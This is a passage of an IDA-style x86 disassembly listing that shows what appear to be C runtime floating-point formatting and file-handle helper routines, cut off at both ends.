loc_41079F: ; CODE XREF: sub_41075B+40�j
test eax, eax
jz short loc_4107AF
push eax
call sub_4057F9
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_4107CA
; ---------------------------------------------------------------------------
loc_4107AF: ; CODE XREF: sub_41075B+46�j
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, ds:dword_433CA0[eax*4]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FDh
mov eax, edi
loc_4107CA: ; CODE XREF: sub_41075B+52�j
pop edi
pop esi
retn
sub_41075B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4107CD proc near ; CODE XREF: sub_4105A7+9A�p
; sub_4105A7+DE�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
mov eax, edx
sar eax, 5
and edx, 1Fh
imul edx, 28h
push ebx
mov ebx, [ebp+arg_4]
push esi
lea esi, ds:433CA0h[eax*4]
mov eax, [esi]
lea ecx, [eax+edx]
movzx eax, byte ptr [ecx+4]
and eax, 80h
mov [ebp+arg_0], eax
mov al, [ecx+24h]
add al, al
movsx eax, al
push edi
mov edi, 4000h
sar eax, 1
cmp ebx, edi
jz short loc_41085F
cmp ebx, 8000h
jz short loc_410859
cmp ebx, 10000h
jz short loc_410845
cmp ebx, 20000h
jz short loc_410845
cmp ebx, 40000h
jnz short loc_41086C
or byte ptr [ecx+4], 80h
mov ecx, [esi]
lea ecx, [ecx+edx+24h]
mov dl, [ecx]
and dl, 81h
or dl, 1
loc_410841: ; CODE XREF: sub_4107CD+8A�j
mov [ecx], dl
jmp short loc_41086C
; ---------------------------------------------------------------------------
loc_410845: ; CODE XREF: sub_4107CD+50�j
; sub_4107CD+58�j
or byte ptr [ecx+4], 80h
mov ecx, [esi]
lea ecx, [ecx+edx+24h]
mov dl, [ecx]
and dl, 82h
or dl, 2
jmp short loc_410841
; ---------------------------------------------------------------------------
loc_410859: ; CODE XREF: sub_4107CD+48�j
and byte ptr [ecx+4], 7Fh
jmp short loc_41086C
; ---------------------------------------------------------------------------
loc_41085F: ; CODE XREF: sub_4107CD+40�j
or byte ptr [ecx+4], 80h
mov ecx, [esi]
lea ecx, [ecx+edx+24h]
and byte ptr [ecx], 80h
loc_41086C: ; CODE XREF: sub_4107CD+60�j
; sub_4107CD+76�j ...
cmp [ebp+arg_0], 0
jnz short loc_410879
mov eax, 8000h
jmp short loc_410884
; ---------------------------------------------------------------------------
loc_410879: ; CODE XREF: sub_4107CD+A3�j
neg eax
sbb eax, eax
and eax, 0C000h
add eax, edi
loc_410884: ; CODE XREF: sub_4107CD+AA�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4107CD endp
; =============== S U B R O U T I N E =======================================
sub_410889 proc near ; CODE XREF: sub_40E072+40�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_4108B1
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4108B1: ; CODE XREF: sub_410889+9�j
mov ecx, ds:dword_426560
mov [eax], ecx
xor eax, eax
pop esi
retn
sub_410889 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4108BD proc near ; CODE XREF: sub_410A38+6�p
; DATA XREF: sub_40F70B+55�o
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
mov esi, [ebp+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_405771
cmp eax, 65h
jmp short loc_4108EC
; ---------------------------------------------------------------------------
loc_4108E0: ; CODE XREF: sub_4108BD+30�j
inc esi
movzx eax, byte ptr [esi]
push eax
call sub_40F17F
test eax, eax
loc_4108EC: ; CODE XREF: sub_4108BD+21�j
pop ecx
jnz short loc_4108E0
movsx eax, byte ptr [esi]
push eax
call sub_405771
cmp eax, 78h
pop ecx
jnz short loc_410900
inc esi
inc esi
loc_410900: ; CODE XREF: sub_4108BD+3F�j
mov ecx, [ebp+var_10]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
mov al, [esi]
mov cl, [ecx]
mov [esi], cl
inc esi
loc_410912: ; CODE XREF: sub_4108BD+60�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_410912
cmp [ebp+var_4], cl
pop esi
jz short locret_41092C
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
locret_41092C: ; CODE XREF: sub_4108BD+66�j
leave
retn
sub_4108BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41092E proc near ; CODE XREF: sub_410A46+6�p
; DATA XREF: sub_40F70B+4B�o
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+arg_0]
mov cl, [eax]
test cl, cl
mov esi, [ebp+var_10]
jz short loc_410961
mov edx, [esi+0BCh]
mov edx, [edx]
mov dl, [edx]
loc_410956: ; CODE XREF: sub_41092E+31�j
cmp cl, dl
jz short loc_410961
inc eax
mov cl, [eax]
test cl, cl
jnz short loc_410956
loc_410961: ; CODE XREF: sub_41092E+1C�j
; sub_41092E+2A�j
mov cl, [eax]
inc eax
test cl, cl
jz short loc_41099E
jmp short loc_410975
; ---------------------------------------------------------------------------
loc_41096A: ; CODE XREF: sub_41092E+4B�j
cmp cl, 65h
jz short loc_41097B
cmp cl, 45h
jz short loc_41097B
inc eax
loc_410975: ; CODE XREF: sub_41092E+3A�j
mov cl, [eax]
test cl, cl
jnz short loc_41096A
loc_41097B: ; CODE XREF: sub_41092E+3F�j
; sub_41092E+44�j
mov edx, eax
loc_41097D: ; CODE XREF: sub_41092E+53�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_41097D
mov ecx, [esi+0BCh]
mov ecx, [ecx]
push ebx
mov bl, [eax]
cmp bl, [ecx]
pop ebx
jnz short loc_410994
dec eax
loc_410994: ; CODE XREF: sub_41092E+63�j
; sub_41092E+6E�j
mov cl, [edx]
inc eax
inc edx
test cl, cl
mov [eax], cl
jnz short loc_410994
loc_41099E: ; CODE XREF: sub_41092E+38�j
cmp [ebp+var_4], 0
pop esi
jz short locret_4109AC
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
locret_4109AC: ; CODE XREF: sub_41092E+75�j
leave
retn
sub_41092E endp
; ---------------------------------------------------------------------------
word_4109AE dw 0EED9h ; DATA XREF: sub_40F70B+28�o
dd 424448Bh, 0E0DF18DCh, 7A41C4F6h, 40C03304h, 0C3C033C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4109C4 proc near ; CODE XREF: sub_410A04+E�p
; DATA XREF: sub_40F70B+41�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_C]
push [ebp+arg_8]
jz short loc_4109EE
lea eax, [ebp+var_8]
push eax
call sub_4114AD
mov ecx, [ebp+var_8]
mov eax, [ebp+arg_4]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
jmp short loc_4109FF
; ---------------------------------------------------------------------------
loc_4109EE: ; CODE XREF: sub_4109C4+F�j
lea eax, [ebp+arg_0]
push eax
call sub_411553
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
mov [eax], ecx
loc_4109FF: ; CODE XREF: sub_4109C4+28�j
add esp, 0Ch
leave
retn
sub_4109C4 endp
; =============== S U B R O U T I N E =======================================
sub_410A04 proc near ; DATA XREF: sub_40F70B+14�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_4109C4
add esp, 10h
retn
sub_410A04 endp
; =============== S U B R O U T I N E =======================================
sub_410A1B proc near ; CODE XREF: sub_410A54+88�p
; sub_41101E+8A�p ...
test edi, edi
push esi
mov esi, eax
jz short loc_410A36
push esi
call sub_404130
inc eax
push eax
push esi
add esi, edi
push esi
call sub_407370
add esp, 10h
loc_410A36: ; CODE XREF: sub_410A1B+5�j
pop esi
retn
sub_410A1B endp
; =============== S U B R O U T I N E =======================================
sub_410A38 proc near ; DATA XREF: sub_40F70B+1E�o
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_4108BD
pop ecx
pop ecx
retn
sub_410A38 endp
; =============== S U B R O U T I N E =======================================
sub_410A46 proc near ; DATA XREF: sub_40F70B+A�o
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_41092E
pop ecx
pop ecx
retn
sub_410A46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410A54 proc near ; CODE XREF: sub_410BC1+B7�p
; sub_4111CC+E1�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push [ebp+arg_14]
lea ecx, [ebp+var_10]
mov ebx, eax
call sub_40271F
xor esi, esi
cmp ebx, esi
jnz short loc_410A9B
loc_410A70: ; CODE XREF: sub_410A54+4A�j
call sub_4057D3
push 16h
loc_410A77: ; CODE XREF: sub_410A54+67�j
pop edi
push esi
push esi
push esi
push esi
push esi
mov [eax], edi
call sub_402F39
add esp, 14h
cmp [ebp+var_4], 0
jz short loc_410A94
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_410A94: ; CODE XREF: sub_410A54+37�j
mov eax, edi
jmp loc_410BBC
; ---------------------------------------------------------------------------
loc_410A9B: ; CODE XREF: sub_410A54+1A�j
cmp [ebp+arg_0], esi
jbe short loc_410A70
cmp [ebp+arg_4], esi
jle short loc_410AAA
mov eax, [ebp+arg_4]
jmp short loc_410AAC
; ---------------------------------------------------------------------------
loc_410AAA: ; CODE XREF: sub_410A54+4F�j
xor eax, eax
loc_410AAC: ; CODE XREF: sub_410A54+54�j
add eax, 9
cmp [ebp+arg_0], eax
ja short loc_410ABD
call sub_4057D3
push 22h
jmp short loc_410A77
; ---------------------------------------------------------------------------
loc_410ABD: ; CODE XREF: sub_410A54+5E�j
cmp [ebp+arg_10], 0
jz short loc_410AE1
mov edx, [ebp+arg_C]
xor eax, eax
cmp [ebp+arg_4], esi
setnle al
xor ecx, ecx
cmp dword ptr [edx], 2Dh
setz cl
mov edi, eax
add ecx, ebx
mov eax, ecx
call sub_410A1B
loc_410AE1: ; CODE XREF: sub_410A54+6D�j
mov edi, [ebp+arg_C]
cmp dword ptr [edi], 2Dh
mov esi, ebx
jnz short loc_410AF1
mov byte ptr [ebx], 2Dh
lea esi, [ebx+1]
loc_410AF1: ; CODE XREF: sub_410A54+95�j
cmp [ebp+arg_4], 0
jle short loc_410B0F
lea eax, [esi+1]
mov cl, [eax]
mov [esi], cl
mov esi, eax
mov eax, [ebp+var_10]
mov eax, [eax+0BCh]
mov eax, [eax]
mov al, [eax]
mov [esi], al
loc_410B0F: ; CODE XREF: sub_410A54+A1�j
xor eax, eax
cmp [ebp+arg_10], al
setz al
add eax, [ebp+arg_4]
add esi, eax
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_410B27
or ebx, 0FFFFFFFFh
jmp short loc_410B2C
; ---------------------------------------------------------------------------
loc_410B27: ; CODE XREF: sub_410A54+CC�j
sub ebx, esi
add ebx, [ebp+arg_0]
loc_410B2C: ; CODE XREF: sub_410A54+D1�j
push offset aE000 ; "e+000"
push ebx
push esi
call sub_4076D5
add esp, 0Ch
xor ebx, ebx
test eax, eax
jz short loc_410B4E
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_410B4E: ; CODE XREF: sub_410A54+EB�j
cmp [ebp+arg_8], ebx
lea ecx, [esi+2]
jz short loc_410B59
mov byte ptr [esi], 45h
loc_410B59: ; CODE XREF: sub_410A54+100�j
mov eax, [edi+0Ch]
inc esi
cmp byte ptr [eax], 30h
jz short loc_410B90
mov eax, [edi+4]
dec eax
jns short loc_410B6D
neg eax
mov byte ptr [esi], 2Dh
loc_410B6D: ; CODE XREF: sub_410A54+112�j
inc esi
cmp eax, 64h
jl short loc_410B7D
cdq
push 64h
pop edi
idiv edi
add [esi], al
mov eax, edx
loc_410B7D: ; CODE XREF: sub_410A54+11D�j
inc esi
cmp eax, 0Ah
jl short loc_410B8D
cdq
push 0Ah
pop edi
idiv edi
add [esi], al
mov eax, edx
loc_410B8D: ; CODE XREF: sub_410A54+12D�j
add [esi+1], al
loc_410B90: ; CODE XREF: sub_410A54+10C�j
test ds:byte_426564, 1
jz short loc_410BAD
cmp byte ptr [ecx], 30h
jnz short loc_410BAD
push 3
lea eax, [ecx+1]
push eax
push ecx
call sub_407370
add esp, 0Ch
loc_410BAD: ; CODE XREF: sub_410A54+143�j
; sub_410A54+148�j
cmp [ebp+var_4], 0
jz short loc_410BBA
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_410BBA: ; CODE XREF: sub_410A54+15D�j
xor eax, eax
loc_410BBC: ; CODE XREF: sub_410A54+42�j
pop edi
pop esi
pop ebx
leave
retn
sub_410A54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410BC1 proc near ; CODE XREF: sub_410C8F+14�p
; sub_4112C4+7C�p
var_2C = dword ptr -2Ch
var_1C = byte ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
push 16h
pop esi
push esi
lea ecx, [ebp+var_1C]
push ecx
lea ecx, [ebp+var_2C]
push ecx
push dword ptr [eax+4]
push dword ptr [eax]
call sub_411771
xor ebx, ebx
add esp, 14h
cmp edi, ebx
jnz short loc_410C11
loc_410BF9: ; CODE XREF: sub_410BC1+55�j
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_410C80
; ---------------------------------------------------------------------------
loc_410C11: ; CODE XREF: sub_410BC1+36�j
mov eax, [ebp+arg_8]
cmp eax, ebx
jbe short loc_410BF9
cmp eax, 0FFFFFFFFh
mov esi, [ebp+arg_C]
jnz short loc_410C25
or eax, 0FFFFFFFFh
jmp short loc_410C39
; ---------------------------------------------------------------------------
loc_410C25: ; CODE XREF: sub_410BC1+5D�j
xor ecx, ecx
cmp [ebp+var_2C], 2Dh
setz cl
sub eax, ecx
xor ecx, ecx
cmp esi, ebx
setnle cl
sub eax, ecx
loc_410C39: ; CODE XREF: sub_410BC1+62�j
lea ecx, [ebp+var_2C]
push ecx
lea ecx, [esi+1]
push ecx
push eax
xor eax, eax
cmp [ebp+var_2C], 2Dh
setz al
xor ecx, ecx
cmp esi, ebx
setnle cl
add eax, edi
add ecx, eax
push ecx
call sub_4115F9
add esp, 10h
cmp eax, ebx
jz short loc_410C67
mov [edi], bl
jmp short loc_410C80
; ---------------------------------------------------------------------------
loc_410C67: ; CODE XREF: sub_410BC1+A0�j
push [ebp+arg_14]
lea eax, [ebp+var_2C]
push ebx
push eax
push [ebp+arg_10]
mov eax, edi
push esi
push [ebp+arg_8]
call sub_410A54
add esp, 18h
loc_410C80: ; CODE XREF: sub_410BC1+4E�j
; sub_410BC1+A4�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_410BC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410C8F proc near ; CODE XREF: sub_410CAD+BD�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_410BC1
add esp, 18h
pop ebp
retn
sub_410C8F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410CAD proc near ; CODE XREF: sub_4112C4+63�p
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 24h
push esi
push edi
push [ebp+arg_14]
lea ecx, [ebp+var_24]
mov [ebp+var_14], 3FFh
xor edi, edi
mov [ebp+var_4], 30h
call sub_40271F
cmp [ebp+arg_C], edi
jge short loc_410CD8
mov [ebp+arg_C], edi
loc_410CD8: ; CODE XREF: sub_410CAD+26�j
mov esi, [ebp+arg_4]
cmp esi, edi
jnz short loc_410D0A
loc_410CDF: ; CODE XREF: sub_410CAD+60�j
call sub_4057D3
push 16h
loc_410CE6: ; CODE XREF: sub_410CAD+77�j
pop esi
push edi
push edi
push edi
push edi
push edi
mov [eax], esi
call sub_402F39
add esp, 14h
cmp [ebp+var_18], 0
jz short loc_410D03
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_410D03: ; CODE XREF: sub_410CAD+4D�j
mov eax, esi
jmp loc_41101A
; ---------------------------------------------------------------------------
loc_410D0A: ; CODE XREF: sub_410CAD+30�j
cmp [ebp+arg_8], edi
jbe short loc_410CDF
mov eax, [ebp+arg_C]
add eax, 0Bh
cmp [ebp+arg_8], eax
mov byte ptr [esi], 0
ja short loc_410D26
call sub_4057D3
push 22h
jmp short loc_410CE6
; ---------------------------------------------------------------------------
loc_410D26: ; CODE XREF: sub_410CAD+6E�j
mov edi, [ebp+arg_0]
mov eax, [edi]
mov [ebp+var_C], eax
mov eax, [edi+4]
mov ecx, eax
shr ecx, 14h
mov edx, 7FFh
push ebx
and ecx, edx
xor ebx, ebx
cmp ecx, edx
jnz loc_410DD8
test ebx, ebx
jnz loc_410DD8
mov eax, [ebp+arg_8]
cmp eax, 0FFFFFFFFh
jnz short loc_410D5C
or eax, eax
jmp short loc_410D5F
; ---------------------------------------------------------------------------
loc_410D5C: ; CODE XREF: sub_410CAD+A9�j
add eax, 0FFFFFFFEh
loc_410D5F: ; CODE XREF: sub_410CAD+AD�j
push 0
push [ebp+arg_C]
lea ebx, [esi+2]
push eax
push ebx
push edi
call sub_410C8F
add esp, 14h
test eax, eax
jz short loc_410D8F
cmp [ebp+var_18], 0
mov byte ptr [esi], 0
jz loc_411019
mov ecx, [ebp+var_1C]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp loc_411019
; ---------------------------------------------------------------------------
loc_410D8F: ; CODE XREF: sub_410CAD+C7�j
cmp byte ptr [ebx], 2Dh
jnz short loc_410D98
mov byte ptr [esi], 2Dh
inc esi
loc_410D98: ; CODE XREF: sub_410CAD+E5�j
mov byte ptr [esi], 30h
inc esi
cmp [ebp+arg_10], 0
push 65h
setz al
dec al
and al, 0E0h
add al, 78h
mov [esi], al
inc esi
push esi
call sub_411480
test eax, eax
pop ecx
pop ecx
jz loc_41100A
cmp [ebp+arg_10], 0
setz cl
dec cl
and cl, 0E0h
add cl, 70h
mov [eax], cl
mov byte ptr [eax+3], 0
jmp loc_41100A
; ---------------------------------------------------------------------------
loc_410DD8: ; CODE XREF: sub_410CAD+95�j
; sub_410CAD+9D�j
and eax, 80000000h
xor ecx, ecx
or ecx, eax
jz short loc_410DE7
mov byte ptr [esi], 2Dh
inc esi
loc_410DE7: ; CODE XREF: sub_410CAD+134�j
mov ebx, [ebp+arg_10]
mov byte ptr [esi], 30h
inc esi
test ebx, ebx
setz al
dec al
and al, 0E0h
add al, 78h
mov [esi], al
mov ecx, [edi+4]
inc esi
neg ebx
sbb ebx, ebx
and ebx, 0FFFFFFE0h
and ecx, 7FF00000h
xor eax, eax
add ebx, 27h
xor edx, edx
or eax, ecx
jnz short loc_410E38
mov byte ptr [esi], 30h
mov ecx, [edi+4]
mov eax, [edi]
and ecx, 0FFFFFh
inc esi
or eax, ecx
jnz short loc_410E2F
mov [ebp+var_14], edx
jmp short loc_410E3C
; ---------------------------------------------------------------------------
loc_410E2F: ; CODE XREF: sub_410CAD+17B�j
mov [ebp+var_14], 3FEh
jmp short loc_410E3C
; ---------------------------------------------------------------------------
loc_410E38: ; CODE XREF: sub_410CAD+168�j
mov byte ptr [esi], 31h
inc esi
loc_410E3C: ; CODE XREF: sub_410CAD+180�j
; sub_410CAD+189�j
mov eax, esi
inc esi
cmp [ebp+arg_C], edx
mov [ebp+arg_4], eax
jnz short loc_410E4B
mov [eax], dl
jmp short loc_410E5A
; ---------------------------------------------------------------------------
loc_410E4B: ; CODE XREF: sub_410CAD+198�j
mov ecx, [ebp+var_24]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
mov cl, [ecx]
mov [eax], cl
loc_410E5A: ; CODE XREF: sub_410CAD+19C�j
mov ecx, [edi+4]
mov eax, [edi]
and ecx, 0FFFFFh
mov [ebp+var_8], ecx
ja short loc_410E72
cmp eax, edx
jbe loc_410F27
loc_410E72: ; CODE XREF: sub_410CAD+1BB�j
mov [ebp+var_C], edx
mov [ebp+var_8], 0F0000h
loc_410E7C: ; CODE XREF: sub_410CAD+220�j
cmp [ebp+arg_C], 0
jle short loc_410ECF
mov edx, [edi+4]
and edx, [ebp+var_8]
mov eax, [edi]
movsx ecx, word ptr [ebp+var_4]
and eax, [ebp+var_C]
and edx, 0FFFFFh
call sub_4118E0
add ax, 30h
movzx eax, ax
cmp ax, 39h
jbe short loc_410EAB
add eax, ebx
loc_410EAB: ; CODE XREF: sub_410CAD+1FA�j
mov ecx, [ebp+var_8]
sub [ebp+var_4], 4
mov [esi], al
mov eax, [ebp+var_C]
shrd eax, ecx, 4
shr ecx, 4
inc esi
dec [ebp+arg_C]
cmp word ptr [ebp+var_4], 0
mov [ebp+var_C], eax
mov [ebp+var_8], ecx
jge short loc_410E7C
loc_410ECF: ; CODE XREF: sub_410CAD+1D3�j
cmp word ptr [ebp+var_4], 0
jl short loc_410F27
mov edx, [edi+4]
and edx, [ebp+var_8]
mov eax, [edi]
movsx ecx, word ptr [ebp+var_4]
and eax, [ebp+var_C]
and edx, 0FFFFFh
call sub_4118E0
cmp ax, 8
jbe short loc_410F27
lea eax, [esi-1]
loc_410EF9: ; CODE XREF: sub_410CAD+25C�j
mov cl, [eax]
cmp cl, 66h
jz short loc_410F05
cmp cl, 46h
jnz short loc_410F0B
loc_410F05: ; CODE XREF: sub_410CAD+251�j
mov byte ptr [eax], 30h
dec eax
jmp short loc_410EF9
; ---------------------------------------------------------------------------
loc_410F0B: ; CODE XREF: sub_410CAD+256�j
cmp eax, [ebp+arg_4]
jz short loc_410F24
mov cl, [eax]
cmp cl, 39h
jnz short loc_410F1E
add bl, 3Ah
mov [eax], bl
jmp short loc_410F27
; ---------------------------------------------------------------------------
loc_410F1E: ; CODE XREF: sub_410CAD+268�j
inc cl
mov [eax], cl
jmp short loc_410F27
; ---------------------------------------------------------------------------
loc_410F24: ; CODE XREF: sub_410CAD+261�j
inc byte ptr [eax-1]
loc_410F27: ; CODE XREF: sub_410CAD+1BF�j
; sub_410CAD+227�j ...
cmp [ebp+arg_C], 0
jle short loc_410F3E
push [ebp+arg_C]
push 30h
push esi
call sub_407B70
add esp, 0Ch
add esi, [ebp+arg_C]
loc_410F3E: ; CODE XREF: sub_410CAD+27E�j
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_410F48
mov esi, eax
loc_410F48: ; CODE XREF: sub_410CAD+297�j
cmp [ebp+arg_10], 0
mov cl, 34h
setz al
dec al
and al, 0E0h
add al, 70h
mov [esi], al
mov eax, [edi]
mov edx, [edi+4]
inc esi
call sub_4118E0
xor ebx, ebx
and eax, 7FFh
and edx, ebx
sub eax, [ebp+var_14]
push ebx
pop ecx
sbb edx, ecx
js short loc_410F82
jg short loc_410F7C
cmp eax, ebx
jb short loc_410F82
loc_410F7C: ; CODE XREF: sub_410CAD+2C9�j
mov byte ptr [esi], 2Bh
inc esi
jmp short loc_410F8C
; ---------------------------------------------------------------------------
loc_410F82: ; CODE XREF: sub_410CAD+2C7�j
; sub_410CAD+2CD�j
mov byte ptr [esi], 2Dh
inc esi
neg eax
adc edx, ebx
neg edx
loc_410F8C: ; CODE XREF: sub_410CAD+2D3�j
cmp edx, ebx
mov edi, esi
mov byte ptr [esi], 30h
jl short loc_410FB9
mov ecx, 3E8h
jg short loc_410FA0
cmp eax, ecx
jb short loc_410FB9
loc_410FA0: ; CODE XREF: sub_410CAD+2ED�j
push ebx
push ecx
push edx
push eax
call sub_411800
add al, 30h
mov [esi], al
inc esi
cmp esi, edi
mov [ebp+var_10], edx
mov eax, ecx
mov edx, ebx
jnz short loc_410FC4
loc_410FB9: ; CODE XREF: sub_410CAD+2E6�j
; sub_410CAD+2F1�j
test edx, edx
jl short loc_410FDB
jg short loc_410FC4
cmp eax, 64h
jb short loc_410FDB
loc_410FC4: ; CODE XREF: sub_410CAD+30A�j
; sub_410CAD+310�j
push 0
push 64h
push edx
push eax
call sub_411800
add al, 30h
mov [esi], al
mov [ebp+var_10], edx
inc esi
mov eax, ecx
mov edx, ebx
loc_410FDB: ; CODE XREF: sub_410CAD+30E�j
; sub_410CAD+315�j
cmp esi, edi
jnz short loc_410FEA
test edx, edx
jl short loc_411002
jg short loc_410FEA
cmp eax, 0Ah
jb short loc_411002
loc_410FEA: ; CODE XREF: sub_410CAD+330�j
; sub_410CAD+336�j
push 0
push 0Ah
push edx
push eax
call sub_411800
add al, 30h
mov [esi], al
mov [ebp+var_10], edx
inc esi
mov eax, ecx
mov [ebp+var_10], ebx
loc_411002: ; CODE XREF: sub_410CAD+334�j
; sub_410CAD+33B�j
add al, 30h
mov [esi], al
mov byte ptr [esi+1], 0
loc_41100A: ; CODE XREF: sub_410CAD+10B�j
; sub_410CAD+126�j
cmp [ebp+var_18], 0
jz short loc_411017
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411017: ; CODE XREF: sub_410CAD+361�j
xor eax, eax
loc_411019: ; CODE XREF: sub_410CAD+D0�j
; sub_410CAD+DD�j
pop ebx
loc_41101A: ; CODE XREF: sub_410CAD+58�j
pop edi
pop esi
leave
retn
sub_410CAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41101E proc near ; CODE XREF: sub_411113+A2�p
; sub_4111CC+C3�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push [ebp+arg_C]
mov ebx, eax
mov esi, [ebx+4]
mov edi, ecx
lea ecx, [ebp+var_10]
dec esi
call sub_40271F
test edi, edi
jnz short loc_41106B
loc_41103E: ; CODE XREF: sub_41101E+51�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402F39
add esp, 14h
cmp [ebp+var_4], 0
jz short loc_411064
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411064: ; CODE XREF: sub_41101E+3D�j
mov eax, esi
jmp loc_41110E
; ---------------------------------------------------------------------------
loc_41106B: ; CODE XREF: sub_41101E+1E�j
cmp [ebp+arg_0], 0
jbe short loc_41103E
cmp [ebp+arg_8], 0
jz short loc_41108F
cmp esi, [ebp+arg_4]
jnz short loc_41108F
xor eax, eax
cmp dword ptr [ebx], 2Dh
setz al
add eax, esi
add eax, edi
mov byte ptr [eax], 30h
mov byte ptr [eax+1], 0
loc_41108F: ; CODE XREF: sub_41101E+57�j
; sub_41101E+5C�j
cmp dword ptr [ebx], 2Dh
mov esi, edi
jnz short loc_41109C
mov byte ptr [edi], 2Dh
lea esi, [edi+1]
loc_41109C: ; CODE XREF: sub_41101E+76�j
mov eax, [ebx+4]
xor edi, edi
inc edi
test eax, eax
jg short loc_4110B3
mov eax, esi
call sub_410A1B
mov byte ptr [esi], 30h
inc esi
jmp short loc_4110B5
; ---------------------------------------------------------------------------
loc_4110B3: ; CODE XREF: sub_41101E+86�j
add esi, eax
loc_4110B5: ; CODE XREF: sub_41101E+93�j
cmp [ebp+arg_4], 0
jle short loc_4110FF
mov eax, esi
call sub_410A1B
mov eax, [ebp+var_10]
mov eax, [eax+0BCh]
mov eax, [eax]
mov al, [eax]
mov [esi], al
